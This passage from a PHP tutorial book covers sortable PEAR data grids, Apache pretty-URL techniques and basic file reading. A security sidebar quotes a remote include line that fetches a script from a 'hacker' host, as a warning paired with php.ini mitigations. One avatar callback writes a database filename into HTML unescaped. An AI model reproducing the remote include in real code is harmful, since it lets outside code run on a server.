      11 http://pear.php.net/package/MDB2_Driver_mysql/
      12 http://pear.php.net/package/Structures_DataGrid_Renderer_HTMLTable/
      13 http://pear.php.net/package/Structures_DataGrid_Renderer_Pager/

                                                           pearDataGrid.php (excerpt)

   $datagrid = new Structures_DataGrid(2);
   $options = array(
       'dsn' => "mysql://$user:$password@$db_host/$db_name");

   $sql = "SELECT * FROM user";
   $bind = $datagrid->bind($sql, $options);

   if (PEAR::isError($bind))
   {
     error_log('DataGrid Error: '. $bind->getMessage());
     $gridsource = '';
   }



We instantiate the grid, specifying that each page should display two rows. We then
bind the grid to the SQL query using the bind method. We pass database information
in the $options array to enable our Structures_DataGrid object to automatically
choose the correct database driver to use, and make a connection. We check for errors
that may have been generated from the bind method call using the PEAR::isError
method, and if we detect an error, we make sure to log it and set our $gridsource
variable to an empty string. This will ensure that the displayed web page will not
contain any cryptic error messages.

If no errors are reported, we can proceed to build our grid. We start by defining the
columns and setting rendering options for the grid:

                                                           pearDataGrid.php (excerpt)

   else
   {
     $columns = array(
         'first_name' => 'First Name',
         'last_name' => 'Last Name',
         'email' => 'E-Mail',
         'login' => 'Login Name',
         'signature' => 'Signature',
     );
     $datagrid->generateColumns($columns);
     $renderer_options = array(
         'sortIconASC' => '&uArr;',
         'sortIconDESC' => '&dArr;',
         'headerAttributes' => array('bgcolor' => '#E3E3E3'),
         'evenRowAttributes' => array('bgcolor' => '#A6A6A6'),
     );
     $datagrid->setRendererOptions($renderer_options);

     $renderer = $datagrid->getRenderer();
     $renderer->setTableAttribute('cellspacing', 0);
     $renderer->setTableAttribute('cellpadding', 5);
     $renderer->setTableAttribute('border', 1);




      To generate the columns of our grid, we call the convenient generateColumns
      method. All we have to do is supply an array that maps our SQL field names to
      column labels—Structures_DataGrid will do the rest.

      Next, we retrieve the HTML source of our grid and pager using the getOutput
      method, and store it in the $gridsource variable:

                                                                pearDataGrid.php (excerpt)

             $gridbody = $datagrid->getOutput();
             if (PEAR::isError($gridbody))
             {
               error_log('DataGrid render error: ' .
                   $gridbody->getMessage());
               $gridbody = '';
             }

             $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER);
             if (PEAR::isError($gridpager))
             {
               error_log('DataGrid render error: ' .
                   $gridpager->getMessage());
               $gridpager = '';
             }
             $gridsource = $gridbody . $gridpager;
         }
       ?>



      When we call the getOutput method, we make sure to test the return value for errors
      and take appropriate action.

      Finally, our grid can be output to a web page:

                                                                     pearDataGrid.php (excerpt)

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <h1>PEAR::Structures_DataGrid</h1>
     <?php echo $gridsource ?>
   </body>
 </html>



With these scant few lines of code, we can generate a dynamic table that lets users
order the data by clicking on each column’s header, and that pages through the
results automatically. The resulting output can be seen in Figure 5.4.




                         Figure 5.4. Structures_DataGrid in action


As we can see, Structures_DataGrid handles a huge amount of the work necessary
to generate a very feature-rich table, including modifying the SQL query to
incorporate ordering and paging, and making sure that the icon to denote ordering
direction is shown correctly.


      How do I create a customized data grid?
      Showing tabular data in a table seems fairly straightforward, but when the tables
      are part of a web application, customization is often required. For example, you
      might want to display a list of member information in a tabular format, customizing
      one column to display members’ avatar thumbnails.

      Solution
      The Structures_DataGrid class allows you to specify formatter function callbacks
      to customize the data shown in a table. In this solution, we’ll add customized
      columns for the members’ names and avatars. See “How do I display data in a
      sortable table?” in this chapter for the list of required PEAR packages.

      The first step is to include the required PHP files:

                                                             pearDataGridCustom.php (excerpt)

       <?php
         require 'dbcred.php';
         require 'Structures/DataGrid.php';



      dbcred.php contains the database login credentials for use with our
      Structures_DataGrid object. The file contains credentials relevant to our testing
      environment, so be sure to change them should you wish to try this on your own
      web server. Structures/DataGrid.php is required to create our Structures_DataGrid
      object.

      Next, we define some custom callback functions, getName, and getThumbnail:

                                                             pearDataGridCustom.php (excerpt)

         function getName($data)
         {
           return $data['record']['first_name'] .' '.
               $data['record']['last_name'];
         }

         function getThumbnail($data)
         {
           if (strlen($data['record']['filename']) > 0)
           {
             return '<img src="images/avatars/'
                 .$data['record']['filename']. '" />';
           }
           else
           {
             return '<img src="images/avatars/missing.gif" />';
           }
         }




The first function, getName, simply concatenates the first_name and last_name
columns. getThumbnail returns an HTML <img> tag using the filename column.
When a callback function is called, it’s passed a single argument: an array that
contains the database row, as well as some information about the column in question
(the current ordering and the row number). Callback functions must return the string
to be displayed in the column.
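
To make the callback contract concrete, here's a minimal sketch that calls a formatter by hand with a hand-built array. Only the 'record' key comes from the code above; the function name formatFullName and the sample values are assumptions made for illustration, and the htmlspecialchars call is an addition of ours that keeps any markup stored in the database from being rendered.

```php
<?php
// Hypothetical formatter: same shape as getName, plus HTML escaping.
function formatFullName($data)
{
    $record = $data['record'];
    $name = $record['first_name'] . ' ' . $record['last_name'];
    // Escape the value so stored markup is shown as text, not rendered.
    return htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}

// Hand-built stand-in for the array the grid passes to a formatter.
$sample = array(
    'record' => array('first_name' => 'Jane', 'last_name' => '<b>Doe</b>'),
);

echo formatFullName($sample), "\n";
```

Calling the function directly like this is also a handy way to test a formatter before wiring it into a grid.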

We then instantiate our Structures_DataGrid object and create a series of
Structures_DataGrid_Column objects, each of which represents a display column. We
add them to our grid object using the addColumn method:

                                                    pearDataGridCustom.php (excerpt)

   $datagrid = new Structures_DataGrid(2);

   $thumb = new Structures_DataGrid_Column("", "thumb", "thumb",
       null, null, "getThumbnail()");
   $datagrid->addColumn($thumb);

   $name = new Structures_DataGrid_Column("Name", "name",
       "first_name", null, null, "getName()");
   $datagrid->addColumn($name);

   $email = new Structures_DataGrid_Column("E-Mail", "email",
       "email");
   $datagrid->addColumn($email);

   $login = new Structures_DataGrid_Column("Login Name", "login",
       "login");
   $datagrid->addColumn($login);

   $sig = new Structures_DataGrid_Column("Signature", "signature",
       "signature");
   $datagrid->addColumn($sig);

   $datagrid->setDefaultSort(array('first_name' => 'ASC'));




      We also set the default ordering of the data so that it’s arranged by first name, in
      ascending (alphabetical) order. The signature of the Structures_DataGrid_Column
      constructor is shown below:


       Structures_DataGrid_Column(
           string $label,
           [string $field = null],
           [string $orderBy = null],
           [array $attributes = array()],
           [string $autoFillValue = null],
           [mixed $formatter = null],
           [array $formatterArgs = array()]
       );



      Our custom column code above demonstrates two important features: the custom
      formatter functions for the $thumb and $name columns (specified in their last
      arguments), and the orderBy argument for the $name column. In the case of the $name
      column, the orderBy argument is important because once we concatenate the two
      names, the grid can no longer sort by one or the other on its own. As such, we have to
      supply either a column name or an expression on which to sort. In our solution,
      we’ve chosen to sort by the first name.

      Next, we bind the grid to the SQL query using the bind method:

                                                           pearDataGridCustom.php (excerpt)

         $options = array(
             'dsn' => "mysql://$user:$password@$db_host/$db_name");
         $sql = "SELECT DISTINCT * FROM user".
             " LEFT JOIN user_images".
             " ON user.id = user_images.user_id";

         $bind = $datagrid->bind($sql, $options);
         if (PEAR::isError($bind))
         {
           error_log('DataGrid Error: '. $bind->getMessage());
           $gridsource = '';
         }




We pass database information in the $options array so that our
Structures_DataGrid object will be able to automatically choose the correct database
driver to use and make a connection. We check for errors generated from the bind
method call using the PEAR::isError method, and if we detect an error, we make
sure to log it and set our $gridsource variable to an empty string. This ensures that
the displayed web page will not contain any cryptic error messages.

If no errors arise, we can proceed to customize the appearance of our grid. We add
new icons to show the ordering direction, set custom colors for the header row and
the alternate row color, and specify some custom table attributes:

                                                     pearDataGridCustom.php (excerpt)

   else
   {
     $renderer_options = array(
         'sortIconASC' => '<img src="images/up.gif" />',
         'sortIconDESC' => '<img src="images/down.gif" />',
         'headerAttributes' => array('bgcolor' => '#E3E3E3'),
         'evenRowAttributes' => array('bgcolor' => '#A6A6A6'),
     );
     $datagrid->setRendererOptions($renderer_options);

      $renderer = $datagrid->getRenderer();
      $renderer->setTableAttribute('cellspacing', 0);
      $renderer->setTableAttribute('cellpadding', 5);
      $renderer->setTableAttribute('border', 1);



We then retrieve the HTML source of our grid and pager using the getOutput
method, and store it in the $gridsource variable:

                                                         pearDataGridCustom.php (excerpt)

             $gridbody = $datagrid->getOutput();
             if (PEAR::isError($gridbody))
             {
               error_log('DataGrid render error: ' .
                   $gridbody->getMessage());
               $gridbody = '';
             }
             // Finally, render the pager, again checking for errors
             $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER);
             if (PEAR::isError($gridpager))
             {
               error_log('DataGrid render error: ' .
                   $gridpager->getMessage());
               $gridpager = '';
             }
             $gridsource = $gridbody . $gridpager;
         }
       ?>



      When we call the getOutput method, we make sure to test the return value for errors
      and take appropriate action.

      Finally, our grid can be output in a web page:

                                                         pearDataGridCustom.php (excerpt)

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
         ⋮ HTML head contents…
         </head>
         <body>
           <h1>PEAR::Structures_DataGrid, Customized!</h1>
           <?php echo $gridsource ?>
         </body>
       </html>



      We can see the resulting output in Figure 5.5.




                             Figure 5.5. The customized data grid


How do I make “pretty” URLs in PHP?
One of the first things every PHP developer learns is the concept of GET, or query
string, arguments—the variables attached to the end of a URL, which allow the
sending of arbitrary data to your PHP script. However, it quickly becomes apparent
that URLs with lots of query string arguments are quite ugly. In years past there has
been much talk about the importance of creating search engine friendly URLs, but
in reality, this is a myth—any modern spider (Google or Yahoo! for example) will
index URLs that make use of query string arguments. The most compelling argument
for the practice now is “pretty” URLs—URLs that are both human-readable and
easily memorable.

What would you prefer to see:

http://example.org/index.php?action=edit&item=163&what=trackbacks

Or:

http://example.org/edit/trackbacks/for/163-My-Example-Page

Pretty URLs most often consist of three types of elements: the action (/edit), the
type of action (/trackbacks), and one or more key-value pairs
(/for/163-My-Example-Page).


      Solutions
      Apache provides us with several options for creating pretty URLs: AcceptPathInfo,
      MultiViews and mod_rewrite.

      Pretty URLs with AcceptPathInfo
      AcceptPathInfo is an Apache 2 directive that controls whether requests that have
      a path appended to a filename will be accepted or rejected.14 If it’s enabled, the
      path information is made available to PHP in the $_SERVER['PATH_INFO'] variable.
      This facility is usually available to PHP because Apache allows the PHP interpreter
      module to specify that this option is turned on.

      AcceptPathInfo lets us create URLs like this:

      http://example.org/index.php/edit/trackbacks/for/163-My-Example-Page

      This is an improvement on the URL we saw above, but it’s still not entirely pretty,
      as it contains a filename that people must remember, and which is superfluous to
      the URL.

      Pretty URLs with MultiViews
      We can go part of the way to remedying the problem of URLs containing filenames
      by using AcceptPathInfo in conjunction with the MultiViews option.15 MultiViews
      is used for content negotiation, which means that it can be used to send a French
      translation of a resource to browser clients set to prefer reading French, or a GIF
      version of an image to browser clients that prefer GIF over JPEG (or that cannot
      render JPEG images at all).

      MultiViews offers the side-effect of allowing us to reference files without their
      extensions. We enable it using the following in an .htaccess file or in httpd.conf:

       Options MultiViews



      We can now use the following URL:

      http://example.org/index/edit/trackbacks/for/163-My-Example-Page

      14 http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo
      15 http://httpd.apache.org/docs/2.0/content-negotiation.html

Now we’re getting something close to our ideal URL. We can obviously rename our
PHP file from index.php to something a little more intuitive; for example, by naming
it admin.php, we end up with this URL:

http://example.org/admin/edit/trackbacks/for/163-My-Example-Page

Both of these options are supported by Apache by default, but your ability to set
MultiViews in your .htaccess file will depend on your host. Even in this best-case
scenario, though, we still end up with an unwanted element in our URL: the real
filename, which makes this URL longer and harder to remember than one that
doesn’t contain this element.

Pretty URLs with mod_rewrite
mod_rewrite provides us with a very powerful (and complex) system for getting the
exact results we want. However, mod_rewrite is not part of the core Apache server,
and while it’s enabled by default on most distributions (and included with the
Apache Win32 binary), it may not be available on your server. That’s why this is
not the be-all and end-all solution to the problem. The two solutions above are more
portable than this one; however, the code we will use to deal with the paths in this
solution will work with all three solutions.

To use mod_rewrite, we must place something like the following code in an
.htaccess file in the web server’s document root:

 RewriteEngine On
 RewriteCond %{REQUEST_FILENAME} !-f
 RewriteCond %{REQUEST_FILENAME} !-d
 RewriteRule !\.(js|ico|gif|jpg|css)$ /index.php [L]



The first two RewriteCond statements check that the incoming request doesn’t refer
to an existing file or directory. If that’s true, the RewriteRule statement will rewrite
the incoming request to a request for /index.php, as long as the request does not
end with one of the listed filename extensions.
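
If you'd like to experiment with the extension pattern before touching your server configuration, you can try it in PHP, since preg_match accepts the same kind of regular expression. This is only a sketch for playing with the pattern: the function name isRewritten and the sample paths are made up, and it doesn't reproduce the two RewriteCond file checks.

```php
<?php
// Returns true when a path would be handed to index.php by the rule,
// that is, when it does NOT end in one of the listed extensions.
function isRewritten($path)
{
    return preg_match('/\.(js|ico|gif|jpg|css)$/', $path) !== 1;
}

var_dump(isRewritten('/edit/trackbacks/for/163-My-Example-Page')); // bool(true)
var_dump(isRewritten('/styles/main.css'));                          // bool(false)
```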

Once this code is in place, we can create our ideal URL:

http://example.org/edit/trackbacks/for/163-My-Example-Page

      Handling Pretty URLs
      PHP makes the path information available in $_SERVER['PATH_INFO'] for the
      AcceptPathInfo or MultiViews solutions, and in $_SERVER['REQUEST_URI'] when
      using mod_rewrite. We can handle those paths using a simple PHP class that will
      extract the path information from the incoming request.
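
One detail worth keeping in mind is that REQUEST_URI also carries any query string, whereas PATH_INFO does not. The sketch below shows one way to normalize both sources to a bare path. The helper name requestPathFrom is hypothetical, and it takes a $_SERVER-style array as an argument purely so that it can be tried out from the command line.

```php
<?php
// Picks the request path from a $_SERVER-style array (hypothetical helper).
function requestPathFrom(array $server)
{
    if (isset($server['PATH_INFO'])) {
        $path = $server['PATH_INFO'];
    } else {
        // REQUEST_URI may carry a query string; keep only the path part.
        $uri = isset($server['REQUEST_URI']) ? $server['REQUEST_URI'] : '/';
        $pieces = explode('?', $uri, 2);
        $path = $pieces[0];
    }
    // Drop any trailing slashes.
    return rtrim($path, '/');
}

echo requestPathFrom(array('PATH_INFO' => '/edit/trackbacks/')), "\n";
echo requestPathFrom(array('REQUEST_URI' => '/edit/trackbacks?page=2')), "\n";
```

Both calls print /edit/trackbacks. In a live script you'd pass $_SERVER itself.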

      We’ll call the class RequestPath and give it a single private property, $parts, to
      hold all the parts of our request URLs:

                                                               RequestPath.class.php (excerpt)

       class RequestPath
       {
         private $parts = array();



      The actual path parsing happens in the __construct method, which simply explodes
      the path on the forward slash (/) character and then proceeds to handle the first
      two path elements as special cases before dealing with the key-value pairs that follow
      them. The first thing we do is grab the path and trim the trailing / character if there
      is one:

                                                               RequestPath.class.php (excerpt)

         public function __construct()
         {
           if (isset($_SERVER['PATH_INFO']))
           {
             $path = (substr($_SERVER['PATH_INFO'], -1) == "/") ?
                 substr($_SERVER['PATH_INFO'], 0, -1) :
                 $_SERVER['PATH_INFO'];
           }
           else
           {
             $path = (substr($_SERVER['REQUEST_URI'], -1) == "/") ?
                 substr($_SERVER['REQUEST_URI'], 0, -1) :
                 $_SERVER['REQUEST_URI'];
           }



      Next, we split the path into an array on the / character. The first element we’ll
      consider to be the action, the second we’ll consider to be the type:

                                                        RequestPath.class.php (excerpt)

       $bits = explode("/", substr($path, 1));

       $parsed['action'] = array_shift($bits);
       $parsed[] = $parsed['action'];

       $parsed['type'] = array_shift($bits);
       $parsed[] = $parsed['type'];



The remaining elements we group into key-value pairs. If an odd number of elements
remains, we simply place the last element on the end of our key-value array:

                                                        RequestPath.class.php (excerpt)

       $parts_size = sizeof($bits);
       if ($parts_size % 2 != 0) {
         $parts_size -= 1;
       }

       for ($i = 0; $i < $parts_size; $i+=2) {
         $parsed[$bits[$i]] = $bits[$i+1];
         $parsed[] = $bits[$i+1];
       }

       if (sizeof($bits) % 2 != 0) {
         $parsed[] = array_pop($bits);
       }



Finally, as the last step of our constructor method, we assign our assembled array
of path elements to our class’s private $parts array:

                                                        RequestPath.class.php (excerpt)

       $this->parts = $parsed;
   }
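
To see what the assembled array looks like, it can help to run the same parsing steps outside the class. The following is a sketch only: parsePrettyPath is a made-up function name, it uses trim rather than the substr calls shown above to strip the slashes, and the sample path has a deliberately unpaired last element.

```php
<?php
// Standalone version of the constructor's parsing logic (hypothetical name).
function parsePrettyPath($path)
{
    $bits = explode('/', trim($path, '/'));
    $parsed = array();

    // The first two elements are the action and the type.
    $parsed['action'] = array_shift($bits);
    $parsed[] = $parsed['action'];
    $parsed['type'] = array_shift($bits);
    $parsed[] = $parsed['type'];

    // Remaining elements are consumed two at a time as key => value.
    $pairs = count($bits) - (count($bits) % 2);
    for ($i = 0; $i < $pairs; $i += 2) {
        $parsed[$bits[$i]] = $bits[$i + 1];
        $parsed[] = $bits[$i + 1];
    }

    // A leftover element is appended without a key.
    if (count($bits) % 2 != 0) {
        $parsed[] = array_pop($bits);
    }
    return $parsed;
}

print_r(parsePrettyPath('/edit/trackbacks/for/163-My-Example-Page/extra'));
```

The result holds every value twice, once under its name (action, type, for) and once under a numeric index, with the unpaired element extra stored under a numeric index only.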



We can make use of the __get, __set, and __isset magic methods in our
RequestPath class, enabling users of the class to get, set, and test the path element
values by using the key as if it were a class property, and keeping our class nice
and simple:

                                                            RequestPath.class.php (excerpt)

         public function __get($key)
         {
           return $this->parts[$key];
         }
         public function __set($key, $value)
         {
           $this->parts[$key] = $value;
         }
         public function __isset($key)
         {
           return isset($this->parts[$key]);
         }
       }
       ?>
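
If the magic methods are new to you, the sketch below shows when each one fires. PathBag is a made-up stand-in for RequestPath, and its __get differs from the one above in one respect: it returns null for an unknown key instead of triggering an undefined index notice. That's our own variation, not part of the class in the listing.

```php
<?php
// Minimal stand-in for RequestPath, used only to show the magic methods.
class PathBag
{
    private $parts = array();

    public function __get($key)
    {
        // Return null rather than raising a notice for unknown keys.
        return isset($this->parts[$key]) ? $this->parts[$key] : null;
    }

    public function __set($key, $value)
    {
        $this->parts[$key] = $value;
    }

    public function __isset($key)
    {
        return isset($this->parts[$key]);
    }
}

$bag = new PathBag();
$bag->action = 'edit';            // calls __set
var_dump(isset($bag->action));    // calls __isset: bool(true)
var_dump(isset($bag->type));      // bool(false)
var_dump($bag->type);             // calls __get: NULL
```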



      Using the code is even simpler. Imagine that the incoming request is:

      http://yourhostname/edit/trackbacks/for/163-My-Example-Page

      We can access the path information by creating a new RequestPath object:

       <?php
         require_once 'RequestPath.class.php';
         $request = new RequestPath();
         echo "Request action: {$request->action}<br />";
         echo "Request type: {$request->type}<br />";
         echo "Request for: {$request->for}<br />";
       ?>

      That code should output the following:

       Request action: edit<br />
       Request type: trackbacks<br />
       Request for: 163-My-Example-Page<br />



      Discussion
      Once we have pretty URLs set up and functioning, we can start to implement
      professional solution architectures such as the Model-View-Controller architecture, or
      MVC.16 Pretty URLs are fast becoming an essential requirement for popular sites,
      and it’s important to think about your URLs carefully, and make them as
      memorable (or as “guessable”) as possible.
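
As a taste of where this leads, here's a rough sketch of the controller side of such an architecture: a lookup table that maps an action and type to a handler. Everything in it (the $routes table, the dispatch function, the handler messages) is hypothetical, and it uses anonymous functions, which require PHP 5.3 or later. In a real application the action, type, and parameters would come from a RequestPath object.

```php
<?php
// Hypothetical handlers, keyed by "action/type".
$routes = array(
    'edit/trackbacks' => function (array $params) {
        return 'Editing trackbacks for ' . $params['for'];
    },
    'view/comments' => function (array $params) {
        return 'Viewing comments for ' . $params['for'];
    },
);

// Looks up the handler for an action and type; falls back to a 404 message.
function dispatch(array $routes, $action, $type, array $params)
{
    $key = $action . '/' . $type;
    if (!isset($routes[$key])) {
        return '404 Not Found';
    }
    return call_user_func($routes[$key], $params);
}

echo dispatch($routes, 'edit', 'trackbacks',
    array('for' => '163-My-Example-Page')), "\n";
echo dispatch($routes, 'delete', 'everything', array()), "\n";
```

The point of the lookup table is that only the actions we've listed explicitly can ever be run, no matter what a visitor types into the URL.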


Summary
In this chapter, we’ve explored a number of ways to make building web forms and
tables a whole lot easier, in order to free up our time to focus on the aspects of web
development that matter. There’s some degree of commonality between every table
and every form, yet our roles as developers involve handling the differences—we
can automate the common ground, but we need to learn to handle the aspects that
make each case unique. This chapter also gave us a chance to experiment with using
the Apache web server and some simple PHP to apply pretty URLs in our web
applications.

Together, tables, forms, and pretty URLs are common tasks in the working experience
of any web developer. The goal of this chapter has been to highlight the aspects of
development that we can automate, and to make it easier to handle the parts we
can’t. Unfortunately, nothing but experience can make the job easy all the time!




16 http://en.wikipedia.org/wiki/Model-view-controller

Chapter 6

Working with Files
Databases make great tools for storing information because they’re fast and, with
the help of SQL, easy to navigate. Sometimes, though, you need to be able to access
the data stored in a file—be it an image, configuration information, or even a web
page on a remote server. PHP makes such work easy with its powerful collection
of file functions. The only hard part is choosing the right tool for the job!

For the sake of demonstration, I’ve saved a copy of the printable version of Pax
Dickinson’s article “Top 7 PHP Security Blunders!,”1 which we’ll manipulate with
PHP’s file functions. The file is saved as writeSecureScripts.html in this book’s code
archive.




1 http://www.sitepoint.com/article/php-security-blunders


                A Word on Security
               Before you run riot with PHP’s file functions, think carefully about what you’re
               doing: you will be making files from your operating system available on a web
               page that will be exposed to the Internet. Check and double-check the code that
               accesses files—look for holes in your logic that might allow unwanted access to
               those files.

               Be particularly careful when allowing files and directories to be identified via
               URLs, or to be uploaded or downloaded from your site. This warning also extends
               to PHP’s include statements, which can be used to execute scripts included from
               a remote web server, for example: include
               'http://www.hacker.com/bad_script.txt';.

               Because of the potential for danger, php.ini settings are available to turn off this
               functionality. Setting allow_url_fopen = Off disables the URL-aware fopen
               wrappers, so remote files can no longer be opened via URLs. As of version
               5.2, there’s also the allow_url_include setting, which does the same thing for
               the include, include_once, require, and require_once statements. If
               allow_url_fopen is turned off, allow_url_include is automatically turned
               off as well.

               I’ll be highlighting the potential dangers with each solution so that, with care,
               you can learn to write secure code.
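
As a first illustration of the kind of check the warning above has in mind, the sketch below confines a requested filename to a single directory. It's a minimal example under stated assumptions rather than a complete defense: the function name resolveInside is made up, and the demonstration uses a throwaway file in the system temp directory in place of a real downloads folder.

```php
<?php
// Resolves $name inside $baseDir, or returns false if it would escape it.
function resolveInside($baseDir, $name)
{
    $base = realpath($baseDir);
    if ($base === false) {
        return false; // the base directory does not exist
    }
    // basename() discards any directory components such as "../".
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($candidate === false) {
        return false; // the file does not exist
    }
    // The resolved path must still start with the base directory.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $candidate;
}

// Demonstration with a throwaway file in the system temp directory.
$dir = sys_get_temp_dir();
$file = tempnam($dir, 'demo');
var_dump(resolveInside($dir, basename($file)) !== false);   // bool(true)
var_dump(resolveInside($dir, '../../etc/passwd-missing'));  // bool(false)
unlink($file);
```

Because realpath resolves symbolic links, a link inside the directory that points elsewhere fails the final prefix check as well.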



      How do I read a local file?
      There are as many ways to read a local file as you can think of. In this solution,
      we’ll discuss three of the most popular approaches, but if you wish to continue
      investigating, check out the relevant manual page.2

      Solutions
      This section covers three options: reading a file as an array, reading a file as a string,
      and reading a file directly to the screen.




      2 http://www.php.net/filesystem/

Reading a File as an Array
First up is PHP’s file function, which reads a file into an array, using the newline
character to indicate where a new array element should begin:

                                                                fileFunc.php (excerpt)

 <?php
 $file = file('writeSecureScripts.html');
 $lines = count($file);
 $alt = '';
 for ($i=0; $i<$lines; $i++) {
   $alt = ($alt == 'even') ? 'odd' : 'even';
   echo '<div class="' . $alt . '">';
   echo $i . ': ' . htmlspecialchars($file[$i]);
   echo "</div>\n";
 }
 ?>



Hey, presto! Up pops the file in a nicely formatted page so you can examine it line
by line. We simply loop over the $file variable—an array—with our for loop, and
display it as we wish.

One thing you may have noticed in the above code is that we used the ternary
operator for the alternate row colors in the first line inside the for loop. The ternary
operator takes three operands and is a shortcut approach to writing a simple if
statement. The basic syntax is as follows:

 (condition) ? value if true : value if false
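
To see the equivalence, here's the same toggle written both ways. The function names nextClassIf and nextClassTernary are ours, made up for this comparison; the logic is the row-class toggle from the listing above.

```php
<?php
// The toggle written as a full if/else statement.
function nextClassIf($alt)
{
    if ($alt == 'even') {
        return 'odd';
    } else {
        return 'even';
    }
}

// The same toggle written with the ternary operator.
function nextClassTernary($alt)
{
    return ($alt == 'even') ? 'odd' : 'even';
}

$alt = '';
for ($i = 0; $i < 3; $i++) {
    $alt = nextClassTernary($alt);
    echo $i, ': ', $alt, "\n";
}
```

The loop prints even, odd, even for rows 0, 1, and 2. Because $alt starts out as an empty string, the first row is classed as even.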



The output of our work can be seen in Figure 6.1.




                                Figure 6.1. Reading a local file as an array


      Reading a File as a String
      As of PHP 4.3, the function called file_get_contents reads a file straight into a
      string without breaking it up:

                                                                               fileGetFunc.php (excerpt)

       <?php
       $file = file_get_contents('writeSecureScripts.html');
       $file = strip_tags($file);
       ?>
       <form>
         <textarea>
       <?php
       echo htmlspecialchars($file);
       ?>
         </textarea>
       </form>




The content of the file is now displayed in an HTML textarea stripped of all its
HTML tags. The output is depicted in Figure 6.2.
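
The listing above assumes that the file can be read. file_get_contents returns FALSE when it can't, so a more defensive version might look like the sketch below. The helper name readWholeFile is hypothetical, and the temporary file and its contents exist only for the demonstration.

```php
<?php
// Reads a file into a string, returning null when it cannot be read.
function readWholeFile($path)
{
    if (!is_readable($path)) {
        return null;
    }
    $contents = file_get_contents($path);
    // file_get_contents returns false on failure, so compare strictly.
    return ($contents === false) ? null : $contents;
}

// Demonstration with a temporary file (the content is made up).
$tmp = tempnam(sys_get_temp_dir(), 'fgc');
file_put_contents($tmp, "<p>Hello</p>\n");
echo strip_tags(readWholeFile($tmp));          // prints "Hello"
var_dump(readWholeFile($tmp . '.missing'));    // NULL
unlink($tmp);
```

The strict comparison matters because an empty file yields an empty string, which a loose comparison would mistake for a failure.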




                           Figure 6.2. Reading a local file as a string


Reading a File Directly to the Screen
Another way to read a local file is to use the readfile function, which fetches the
content of the file and displays it directly on the screen:

                                                                          readFileFunc.php (excerpt)

 <?php
 readfile('writeSecureScripts.html');
 ?>

      This one line of code displays the file exactly as it was found: do not pass Go,
      do not collect $200. The output is shown in Figure 6.3.




                                 Figure 6.3. Reading a local file directly to the screen


      Discussion
      readfile is a handy way to safeguard your files and bandwidth. By linking all the
      files on your web site through a script using the readfile function, you can prevent
      others from linking directly to them and potentially sapping your web site’s
      bandwidth.3 This approach uses what’s commonly referred to as an “anti-leeching”
      script. If you bring an authentication system and/or HTTP referrer check into the
      mix, you’ll have a system that helps ensure that only legitimate visitors to your
      site can access your files.
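
The core of such a script can be very small. The sketch below sends a file only if its name appears on an explicit list. The function name sendListedFile, the whitelist, and the demo file are all assumptions made for illustration, and the authentication and referrer checks mentioned above are deliberately left out.

```php
<?php
// Sends a file only if its name is on an explicit whitelist.
function sendListedFile($name, array $allowed, $dir)
{
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $path = $dir . DIRECTORY_SEPARATOR . $name;
    if (!is_file($path)) {
        return false;
    }
    // readfile() writes the file straight to the output.
    readfile($path);
    return true;
}

// Demonstration with a throwaway file in the system temp directory.
$dir = sys_get_temp_dir();
$name = 'readfile-demo.txt';
file_put_contents($dir . DIRECTORY_SEPARATOR . $name, "hello\n");
sendListedFile($name, array($name), $dir);                  // prints "hello"
var_dump(sendListedFile('secret.txt', array($name), $dir)); // bool(false)
unlink($dir . DIRECTORY_SEPARATOR . $name);
```

Checking the name against a list, rather than trusting whatever arrives in the URL, is what keeps visitors from requesting arbitrary files.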

      3 For an example of how to prevent this kind of pilfering, see “How do I manage file
      downloads with PHP?”


How do I use file handles?
To use the file functions we saw in the previous solution, you simply need to point
them at the file they have to read, using a path that’s relative to the PHP script that
executes the function. However, the majority of PHP’s file functions use a slightly
different mechanism to access a file—a mechanism that’s very similar to that used
to connect to a database. The process uses the fopen function to “connect” and
fclose to “disconnect.” The value returned from the fopen function is a PHP file
pointer, also known as the handle of the file. Once we have a handle on a file, we
can use it to perform a variety of operations on the file, including reading it,
appending to it, modifying it, and so on.

Solutions
This simple example demonstrates how to open and close that “connection” to the
file:

                                                                 fileHandle.php (excerpt)

    <?php
    $location = 'writeSecureScripts.html';
    $fp = fopen($location, 'rb');
    ⋮ the file handle $fp is now available
    fclose($fp);
    ?>



When you use fopen to connect to a file, you must specify the path to the file and
a mode in which the file is to be accessed (such as r for read-only). The b flag
indicates that the file is to be opened in binary mode. As is noted on the
manual page for fopen,4 binary mode should always be specified to ensure the
portability of your code between operating systems. For more information on the
various modes that are available, read the manual page.
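
fopen returns FALSE if the file can't be opened, so it's worth checking the handle before using it. Here's a small sketch of that check. The wrapper name openForReading is hypothetical, and suppressing the warning with @ is one choice among several; you may prefer to let the warning reach your error log.

```php
<?php
// Opens a file for reading, or returns null if that is not possible.
function openForReading($path)
{
    // The @ suppresses the warning; we check the return value instead.
    $fp = @fopen($path, 'rb');
    return ($fp === false) ? null : $fp;
}

$fp = openForReading(__FILE__);
if ($fp !== null) {
    echo fgets($fp);   // first line of this script
    fclose($fp);
}
var_dump(openForReading('/no/such/file.html'));  // NULL
```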

Handling Small Files
Now that we have a file handle, let’s use it to read the file:



4 http://www.php.net/fopen/

                                                                       fileHandle.php (excerpt)

       <?php
       $location = 'writeSecureScripts.html';
       $fp = fopen($location, 'rb');
       $file_contents = fread($fp, filesize($location));
       fclose($fp);
       echo $file_contents;
       ?>



      This example merely demonstrates file handles in action. Notice that when we use
      fread, the second argument reflects the amount of data, in bytes, that will be read
      from the start of the file. For this argument, I’ve used the filesize function, which
      tells me the total size of the file.
